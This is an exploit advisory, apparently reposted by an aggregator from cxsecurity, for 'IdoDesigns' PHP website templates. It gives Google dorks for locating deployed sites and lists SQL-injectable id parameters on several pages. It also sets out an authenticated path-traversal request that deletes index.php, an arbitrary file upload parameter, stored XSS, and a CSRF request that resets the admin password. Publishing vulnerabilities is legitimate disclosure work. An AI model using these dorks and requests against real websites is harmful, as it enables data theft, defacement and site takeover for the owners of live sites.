IdoDesigns - Multiple Vulnerabilities
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > IdoDesigns 2025-3-5 21:0:14 Author: cxsecurity.com(查看原文) 阅读量:3 收藏

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > IdoDesigns - Multiple Vulnerabilities .:. Google Dorks .:. "Design by www.idodesigns.in" "Web Design by : www.idodesigns.in" "Design by : I DO Designs" You may use the dorks followed by inurl:?id= like ["Design by : I DO Designs" inurl:?id=] .:. Date: March 05,2025 .:. Exploit Author: bRpsd .:. Contact: cy[at]live.no .:. Vendor -> https://www.idodesigns.in/ .:. Product Version -> 1.0 .:. DBMS -> MySQL .:. Tested on > macOS [*nix Darwin Kernel], on local xampp @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Most PHP pages failed to secure parameters from SQLi resulting in Unauthorised SQL Injection with some using Base64 to help secure it but its insufficient, examples: /blog-details.php?id= /services-details.php?id= /gallery-more.php?id= /award-details.php?id= /program-details.php?id= /project-details.php?id= /photos.php?id= Admin Page [Authenticated] Multiple Exploits 1- Authenticated Arbitrary File Deletion: Parameter -> image GET https://site/ADMIN PAGE/blogAdd.php?delete_image=&img_id=1&id=3&image=../../../index.php 2- Authenticated Arbitrary File Upload: POST https://site/ADMIN PAGE/blogAdd.php?edit=1&id=3 Parameter -> images[] 3- Stored XSS: Most [POST] requests to edit pages or posts or users have vulnerable parameters that store XSS which can result in website defacement 4- CSRF is possible to update admin password File: /site/admin page/changePassword.php parameters & data: new_pwd=x&confirm_pwd=x&submit=



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2025030004
如有侵权请联系:admin#unsafe.sh